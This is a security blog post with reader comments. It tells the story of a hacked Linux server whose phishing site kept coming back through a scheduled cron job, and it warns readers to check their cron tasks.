Cenzic 232 Patent
Paid Advertising
web application security lab

Phishing Cron Job

The other day I was interviewing a guy for a position with our company and we got on the topic of phishing. Normally I pretty much avoid the topic, because I was way too intimately involved with it for too long, but he brought it up so we were talking about it. Then he proceeds to tell me his personal phishing story. Inside I was was shuddering because I’ve heard exactly 1 billion personal phishing stories now, and I really didn’t need to hear another one. But then he starts telling me a story I hadn’t heard yet. The story of someone who has had his website used as a phishing site.

Unfortunately I didn’t get a lot of details out of him because I had other things to do, like make sure he was a worthwhile candidate, but I did manage to get an interesting story out of him. He had a crappy little Linux box (he didn’t say what flavor) sitting on an open network - no firewall, no nothing. He was using it to host some domains for some consulting work he did. One day he gets a call from AOL saying that he was hosting a phishing site. Sure enough, he looks at his website and indeed, he was.

He was non-technical so he called a friend of his who was vacationing in the south pacific at the time, and asked him to log in and find out what had happened. It was a pretty boring SQL injection attack that had gained them access. The hole was plugged, the site removed and everyone went back to their day jobs.

The next day, AOL calls him again, saying that he was indeed hosting a phishing site (again) and to please take it down post haste. Well he called up his friend (who I am imagining is getting a little tired of taking phone calls in the middle of the night while visiting Thailand - telling him to jump out of the saddle and nerd out). Anyway, he logs in and cannot see that anyone has logged in. He checks around and finds that there is a timed function to replace the phishing site each day if it happens to be gone.

He didn’t tell me if it was a “cron” job or an “at” job but that was a fairly effective tactic of re-owning a server, without actually exploiting any other holes in the security. Be warned, if you are hacked into, check your cron tasks!

4 Responses to “Phishing Cron Job”

  1. WhiteAcid Says:

    Clever. Did he get the job :p

  2. RSnake Says:

    He wasn’t interviewing for a security position (I don’t work in security anymore, believe it or not) or he definitely wouldn’t have gotten the job if he had been. However, I think he’ll get the job he applied for which was in one of my peer’s team.

    Albert Wu just sent me an interesting email, part of which was interesting to this conversation:

    I just read your blog about cron jobs and phishing, i thought that was interesting. Someone at painewebber set a cron job to go off and to take down all its servers. talk about disgruntled employees.

    Even more reason to check those cron tasks!

  3. id Says:

    He could have had a rootkit as well, first thing I would install…then remove any traces of being there.

    A fun hack would be to create a hidden filesystem and host off of it, if port it was running on wasn’t important you could run a server that is almost invisible to regular users.

  4. RSnake Says:

    Reminds me of kis http://archives.neohapsis.com/archives/sf/linux/2001-q3/0038.html

    That was pretty crazy when it first came out…